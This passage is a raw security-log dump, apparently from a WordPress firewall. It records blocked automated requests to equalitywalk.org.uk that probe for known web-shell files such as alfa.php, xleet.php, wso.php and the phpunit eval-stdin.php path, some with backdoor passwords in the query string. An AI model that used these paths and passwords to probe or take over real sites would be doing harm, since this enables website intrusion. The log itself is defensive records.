ywalk.org.uk/shell20220621.php','','{\"1\":\"python-requests\\/2.28.1\"}','gaKhTL5Qbe6EV0pGF2Ri7SHZ',0,1673843951.1445,1324,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/lufix.php','','{\"1\":\"python-requests\\/2.28.1\"}','dFEKtoc5jGHOwPxZag74upsU',0,1673843963.8447,1416,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/xleet-shell.php','','{\"1\":\"python-requests\\/2.28.1\"}','EGbZL7kpNHP9nAmWFyDOJaUq',0,1673844022.2943,1410,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/1.php','','{\"1\":\"python-requests\\/2.28.1\"}','opaI28QA6d9xUfRmw0rTPOku',0,1673844042.6342,1240,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/alfa.php','','{\"1\":\"python-requests\\/2.28.1\"}','ZpClFMc52HnrosWJYOxuAIK7',0,1673844067.2427,1012,'','GET',403,0,700,0,1,'',0),('51.142.189.28',864992540,'','https://www.equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Tl01jzQuwH3vDhU2ei4GW7qL',0,1673844078.6944,1415,'','GET',403,0,700,0,1,'',0),('51.142.189.28',864992540,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','vLgsaEUdIFcmDrlJ3V7k4Z9Q',0,1673844082.7650,1247,'','GET',403,0,700,0,1,'',0),('51.142.189.28',864992540,'','https://www.equalitywalk.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','GWwCf9VbZRgIsNlKkMurEt7a',0,1673844119.8718,1585,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-admin/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','6hvP9THx0BlVgsbSqkm8OjXK',0,1673844138.3361,905,'','GET',403,0,700,0,1,'',0),('51.142.189.28',864992540,'','https://www.equalitywalk.org.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','VJzKwfraZHLeq2l89icYkAun',0,1673844142.5880,1725,'','GET',403,0,700,0,1,'',0),('51.142.189.28',864992540,'','https://www.equalitywalk.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','TeJtxNaf4n2hudpjZVR790PD',0,1673844164.3062,861,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/autoload_classmap.php','','{\"1\":\"python-requests\\/2.28.1\"}','hK2Sl1QeBaP6CVAHnUtjE7x4',0,1673844190.2302,1655,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/a.php','','{\"1\":\"python-requests\\/2.28.1\"}','uSYLTUjBFNstR8d0ZH4lPEci',0,1673844216.1489,1143,'','GET',403,0,700,0,1,'',0),('51.142.189.28',864992540,'','https://www.equalitywalk.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','6PLRCTJH28YIfihF5vK7cO1r',0,1673844215.8512,1542,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/s.php','','{\"1\":\"python-requests\\/2.28.1\"}','D7pPXKYn54ys3NzRa0odSZmJ',0,1673844243.9961,697,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/c.php','','{\"1\":\"python-requests\\/2.28.1\"}','ugrV1KYnZHEXhf7PtCcqMy6I',0,1673844269.6963,1220,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/autoload_classmap.php','','{\"1\":\"python-requests\\/2.28.1\"}','7fLZoHa8TvhrAbep962zsnQw',0,1673844295.9720,1541,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.28.1\"}','bIgZvcQTFmV5B7dho0zMpRyY',0,1673844343.3623,1471,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/.tmb/cache/shz.php','','{\"1\":\"python-requests\\/2.28.1\"}','qOz7YBh3cywMapEC89162ADT',0,1673844427.4502,907,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/m.php','','{\"1\":\"python-requests\\/2.28.1\"}','nKqQyhA8cMo6dO0sZSLUmtJk',0,1673844472.7444,1172,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/b.php','','{\"1\":\"python-requests\\/2.28.1\"}','dYUMv17I0cwopQnjKDsbk49F',0,1673844493.2624,1066,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"python-requests\\/2.28.1\"}','ACSK8pbvMeEn7aWBHhxOsd9F',0,1673844510.5252,1511,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/404.php','','{\"1\":\"python-requests\\/2.28.1\"}','JHhwdvcgoLU50n7XjDqVW1Kk',0,1673844545.0943,1349,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/sym403.php','','{\"1\":\"python-requests\\/2.28.1\"}','irnlqXjsIwWSCf2Q0Gb3KaHx',0,1673844568.8464,1055,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','WcG4Z50JDLHM2qNzxFCPRIns',0,1673844595.9989,914,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/xmlrpcs.php','','{\"1\":\"python-requests\\/2.28.1\"}','MR1QYvkl3HpCG80feJFt2A7c',0,1673844626.4681,1077,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/0z.php','','{\"1\":\"python-requests\\/2.28.1\"}','5U01Z6ImlLjuindaF8JvgEKH',0,1673844643.9979,1016,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"python-requests\\/2.28.1\"}','cpwsVZOiu8MSLBPkfENglYIG',0,1673844659.1477,1221,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/about.php','','{\"1\":\"python-requests\\/2.28.1\"}','YiJjrKtL1hNVoB5lsWQP8623',0,1673844673.2345,1455,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/o.php','','{\"1\":\"python-requests\\/2.28.1\"}','ylPipDZkoRqVdHzYtQ8O203U',0,1673844734.9904,1134,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/indeeex.php','','{\"1\":\"python-requests\\/2.28.1\"}','y50MvPO9H6SAqf3rFuQCjtg2',0,1673844752.4807,1376,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/ne.php','','{\"1\":\"python-requests\\/2.28.1\"}','i3Ll2RCZfDI7atJOKGUc94Ey',0,1673844782.0625,1325,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/ff.php?pass=shell','','{\"1\":\"python-requests\\/2.28.1\"}','8HWPLQrtfcSehanXyAzlBYdm',0,1673844807.9651,1847,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/8.php','','{\"1\":\"python-requests\\/2.28.1\"}','qiPFOzCSnsTEIYowRuWLkh2M',0,1673844833.6057,1218,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','i0r3VHNyBFQEIj756PnfSc4l',0,1673844862.6664,1743,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/IXR/hunt.php','','{\"1\":\"python-requests\\/2.28.1\"}','IRpMEf1u34o9tkDNUie05mnB',0,1673844882.2983,1745,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/xx.php','','{\"1\":\"python-requests\\/2.28.1\"}','hi9U63lq1k5JyS0DEIf8oTvY',0,1673844902.4331,1342,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/1975.php','','{\"1\":\"python-requests\\/2.28.1\"}','14UpaItbCJi3LvPGqKB5lxdg',0,1673844917.9222,1399,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/small.php','','{\"1\":\"python-requests\\/2.28.1\"}','z0RALSswi7Vxhk5EjDCIqbFv',0,1673844940.6504,3104,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.27.1\"}','x2ROZVF0k7K9HPGfYtE8Mch3',0,1673851571.7149,1134,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','R9tUScWsALgmTMaJwlVqIyoH',0,1673856248.0286,133,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','fAGRC4bW6wqHlsjyM5tmDreo',0,1673856249.0806,108,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','AsamNG6IueCUnBLot7y50ED3',0,1673856276.5040,198,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','5oUl2vJN86nz1SAY0CsgZQuf',0,1673856277.7287,116,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','jp25SuczM9XVt7aGJi0PyfsZ',0,1673856279.4601,102,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','tqvSCJNLQV87PXIf3YR5zEui',0,1673856282.0569,118,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','wPOUxVZqF2IBLDMfRsYcnir7',0,1673856283.2883,131,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','awemIdv2fl4BugQrR1qK9Fno',0,1673856286.3699,94,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','wprN4aHGbu5gc3Xyx7jRkJfn',0,1673856287.3671,96,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','GPunEKq8XgY0DzibIZjlWTVc',0,1673856288.6564,90,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','QyLbUzDfWjOX9pK1lTSgxR0C',0,1673856290.8285,116,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','3BmYKQAnMSxN5df0zUbRPpt9',0,1673856292.7515,93,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','8zw9yqaCnM3tgIXNSPOpJQG4',0,1673856293.7941,92,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','RbIgzAxy193MFpaosWOLStiu',0,1673856295.8250,97,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wp-2018.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wp-2018.php\"}','KEm9lFs1jRfztIyuxprvXkw4',0,1673863856.0605,130,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wp-2020.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wp-2020.php\"}','FJuER30QXxKnUYtjeWyPfOcw',0,1673863856.3548,125,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wp-2021.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wp-2021.php\"}','vhgjUesO3k4t5Pm10MIbE2RK',0,1673863856.5286,123,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wp-2022.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wp-2022.php\"}','fdPUqH2LIRNDBzcGsCwaYmFi',0,1673863856.7061,98,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/0z.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/0z.php\"}','JDdXuQv1pINOrGgMaztnc5HR',0,1673863856.8555,94,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/lock360.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/lock360.php\"}','KFx0lS6jdPHeNc294aMDhpzq',0,1673863857.0174,92,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wp-22.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wp-22.php\"}','w69tGvZoXkEC2leHW8MbzV1O',0,1673863857.1604,132,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wp-2019.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wp-2019.php\"}','gM5cFPW60vAL7y9awBinqeou',0,1673863857.3441,109,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/fw.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/fw.php\"}','7mpGURbo8iOHherAjsN3qSXB',0,1673863857.5000,111,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/2index.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/2index.php\"}','B2hyjoqJeVmTu48Wn3dPsKOC',0,1673863857.6619,167,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/C.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/C.php\"}','NTvxfbp9oZYSd3GjtOJBMcVX',0,1673863857.8815,106,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/c.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/c.php\"}','1dowL7tB28FlrWmUPCYIcEny',0,1673863858.0350,99,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/01.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/01.php\"}','ZuQPywl7rY9dtLhMkHR0CS8J',0,1673863858.1841,96,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/1.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/1.php\"}','lIWJ2msoOtNZFyaCBugXGKvz',0,1673863858.4176,112,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/02.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/02.php\"}','PYvpZusyL120maRxjfFIU4Ng',0,1673863858.5683,98,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wp.php\"}','ai0whGRAWjeNucmQ8bnVILdl',0,1673863858.7086,97,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/404.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/404.php\"}','NEgal1Gnx4jukYtrCFAVKDO0',0,1673863858.8456,95,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/403.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/403.php\"}','4i1KjWF5HtlNXug8R2zambGP',0,1673863858.9857,136,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/admin.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/admin.php\"}','Hxqj0vU7JPyEhIR39WdLoasX',0,1673863859.1716,133,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/good.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/good.php\"}','j2BUxnS7AaTGONotYyQwF0hZ',0,1673863859.3542,95,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/radio.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/radio.php\"}','S7H2oJ0LdfRCZWKQiO4kvnqt',0,1673863859.5457,138,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wp-includes/1index.php?pass=am*guAW8.ryDgz-TYF','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wp-includes\\/1index.php?pass=am*guAW8.ryDgz-TYF\"}','9pSuI7OeEtvjdUfAaQzgCrib',0,1673863859.7310,111,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/1index.php?pass=am*guAW8.ryDgz-TYF','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/1index.php?pass=am*guAW8.ryDgz-TYF\"}','d2QfLDo4iZcyP58pCVaETxIM',0,1673863859.8992,115,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wp_wrong_datlib.php?pass=stusa','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wp_wrong_datlib.php?pass=stusa\"}','HF7Zvn5il6O08mqVsNMKbIYa',0,1673863860.1098,97,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/2index.php?pass=am*guAW8.ryDgz-TYF','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/2index.php?pass=am*guAW8.ryDgz-TYF\"}','e5IrKwAilLf2dUkyDZE1QbR6',0,1673863860.2595,148,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/autoload_classmap.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/autoload_classmap.php\"}','3wifR0ogNMB8ZPAtxcmvUWuS',0,1673863860.4671,92,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wikindex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wikindex.php\"}','XCFdMj9n8J4GESQDptu7Us3W',0,1673863860.5979,94,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php\"}','3XdiZg9wNtarvjTQRJBe7u1G',0,1673863860.7309,119,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/1h6j5.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/1h6j5.php\"}','41jtBGXsqPlMLNS2xF6RDCfe',0,1673863860.8898,94,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wp-admin/xleet.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wp-admin\\/xleet.php\"}','mOaSDBR8PbYwCHVxhL976UrJ',0,1673863861.2284,126,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wp-admin/fx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wp-admin\\/fx.php\"}','seSmt5w9UDuOQMPTJbqNKf1j',0,1673863861.4426,135,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/4price.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/4price.php\"}','ECRKnGF0sukIm4oHPAX5jMN9',0,1673863861.6285,117,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/utchiha.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/utchiha.php\"}','jpxeHhvGJVUdMycuOPoNXf9R',0,1673863861.7926,100,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wp-admin/priv8.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wp-admin\\/priv8.php\"}','zURgGNP4lCLuapSYjMie9O36',0,1673863861.9443,98,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wp-admin/rss.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wp-admin\\/rss.php\"}','8Tt13KEfoar2cU6GBvdgM0um',0,1673863862.0878,97,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/uploads/xleet.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/uploads\\/xleet.php\"}','c52TQkUjFGlWoS3MaHXr6yi7',0,1673863862.2460,130,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/upload.php?mr=exe3','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/upload.php?mr=exe3\"}','JvePLTIk75iXrFsoqbj0pD8w',0,1673863862.5444,102,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/about.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/about.php\"}','BRxmdZ4kNQL8VUpaWYvPyTMg',0,1673863862.6948,105,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wp-includes\\/customize\\/class-wp-customize-nav-menu.php?new\"}','q9ovJCDH3VAMBlN80jPLuc5y',0,1673863862.8395,94,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/ALFA_DATA/alfacgiapi/ups.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/ALFA_DATA\\/alfacgiapi\\/ups.php\"}','rMIYk7BiHZau9XE18x32vq0n',0,1673863862.9730,104,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/3index.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/3index.php\"}','2JxQfRpCnr3Zj9PUYcb5hXAS',0,1673863863.1239,98,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/alfa.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/alfa.php\"}','4gtG0EpPUrl2STJKoZWw5HYc',0,1673863863.2768,128,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/old-index.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/old-index.php\"}','m7Kui0F9kUvdLj6Ms4PB5hfC',0,1673863863.4547,108,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/baindex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/baindex.php\"}','9Pr0JMA4sOkacdSqLG25F1oU',0,1673863863.6125,95,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/wikindex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/wikindex.php\"}','QzIE6dMh2gn8B3CNcY09uKmi',0,1673863863.7551,115,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/doc.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/doc.php\"}','On6N8viJYX9rudKBwTMHlthI',0,1673863863.9175,100,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/haxor.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/haxor.php\"}','gXfx4eJ3scZjivlt9NrHq7IV',0,1673863864.0682,94,'','GET',403,0,700,0,1,'',0),('138.201.83.102',2328449894,'','https://equalitywalk.org.uk/marijuana.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/\\/marijuana.php\"}','pWF0OkrNo6atZPuTDjKy1